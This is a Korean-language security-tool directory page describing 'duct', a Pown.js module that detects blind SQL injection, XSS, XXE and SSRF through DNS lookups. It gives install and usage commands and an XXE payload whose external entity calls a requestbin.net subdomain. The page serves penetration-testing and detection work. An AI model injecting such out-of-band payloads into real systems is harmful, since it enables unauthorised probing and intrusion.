Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
duct — 블라인드 인젝션 공격을 찾기 위한 필수 도구. | Kitploit
도구/GitHubGitHub/pownjs/duct
Web Application ExploitationInformation GatheringDNS Analysis
GitHubpownjs/duct

duct

블라인드 인젝션 공격을 찾기 위한 필수 도구.

저장소 보기
49137년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Follow on Twitter NPM Fury

Pown Duct

블라인드 인젝션 공격을 DNS 사이드 채널을 통해 탐지하는 필수 도구.

크레딧

이 도구는 secapps.com 오픈소스 이니셔티브의 일부입니다.

root@kitploit:~
  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com

참고: 이 도구는 http://requestbin.net 서비스를 활용합니다. 향후 버전에서는 전용 맞춤형 인프라를 사용할 예정입니다.

빠른 시작

이 도구는 Pown.js의 일부로 사용되도록 설계되었지만, 독립적인 도구로도 따로 실행할 수 있습니다.

평소처럼 먼저 Pown을 설치하세요:

root@kitploit:~
$ npm install -g pown@latest

Pown에서 직접 호출:

root@kitploit:~
$ pown duct

또는 프로젝트 루트에 이 모듈을 로컬로 설치:

root@kitploit:~
$ npm install @pown/duct --save

설치 후 pown cli 호출:

root@kitploit:~
$ ./node_modules/.bin/pown-cli duct

또는 글로벌 pown을 사용하여 로컬 도구를 호출할 수도 있습니다:

root@kitploit:~
$ POWN_ROOT=. pown duct

사용법

root@kitploit:~
pown duct <command>

사이드 채널 공격 활성화 도구

Commands:
  pown duct dns  DNS 덕팅

Options:
  --version  버전 표시  [boolean]
  --help     도움말 표시  [boolean]

pown duct dns

root@kitploit:~
pown duct dns

DNS 덕팅

Options:
  --version  버전 표시  [boolean]
  --help     도움말 표시  [boolean]
  --channel  채널 복원  [string]
  --output   출력 형식  [string] [choices: "string", "hexdump", "json"] [default: "string"]

튜토리얼

SQL 인젝션, XSS, XXE, SSRF와 같은 공격을 수행해야 할 때가 있지만, 대상 애플리케이션이 취약함을 전혀 나타내지 않는 경우가 있습니다. 취약점이 존재하는지 확인하는 한 가지 방법은 DNS 해석기가 제어하는 도메인을 조회하도록 강제하는 유효한 공격 벡터를 삽입하는 것입니다. 해석이 성공하면 공격이 성공한 것으로 간주됩니다.

참고: 아마도 고객에게 유사한 서비스를 제공하는 Burp Collaborator에 익숙하실 것입니다.

먼저, 사용 가능한 일회용 DNS 이름이 필요합니다:

root@kitploit:~
$ pown duct dns

스크린샷

제공된 DNS를 사용하여 페이로드를 구성하세요. 예를 들어, 다음 코드는 XXE 취약점이 존재할 경우 DNS 해석을 트리거할 수 있습니다.

root@kitploit:~
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>

공격이 성공하면 터미널에 메시지가 표시됩니다.

스크린샷

도구 다운로드